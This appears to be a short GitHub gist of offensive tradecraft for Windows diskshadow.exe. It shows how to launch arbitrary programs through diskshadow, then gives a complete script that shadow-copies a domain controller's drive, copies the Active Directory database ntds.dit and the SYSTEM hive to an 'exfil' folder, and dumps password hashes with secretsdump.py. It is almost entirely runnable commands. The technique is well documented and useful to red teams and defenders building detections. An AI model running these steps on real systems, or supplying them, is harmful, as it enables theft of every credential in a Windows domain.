Skip to content

Instantly share code, notes, and snippets.

@bohops
Created May 21, 2018 02:21
Show Gist options
  • Save bohops/d34d9cf7793ba5f98009bc4ab2acd8f9 to your computer and use it in GitHub Desktop.
Save bohops/d34d9cf7793ba5f98009bc4ab2acd8f9 to your computer and use it in GitHub Desktop.
Execute
=======
*Interactive Mode
cmd.exe
c:\windows\system32\diskshadow.exe
> exec calc.exe
> exec "cmd.exe" /c calc.exe
> exit
*Script Mode
- Create a script (txt) file (e.g. diskshadow.txt)
exec calc.exe
exec notepad.exe
- Run Script
diskshadow.exe /s c:\test\diskshadow.txt
-----------------------
Extract AD DB
=============
- Create Sscript (diskshadow.txt)
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset
- Run the Script
diskshadow.exe /s c:\diskshadow.txt
- Capture the System Registry Hive
reg.exe save hklm\system c:\exfil\system.bak
-Copy off the AD DB/System Hive and extract hashes with SecretsDump
secretsdump.py -ntds ntds.dit -system system.bak LOCAL
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment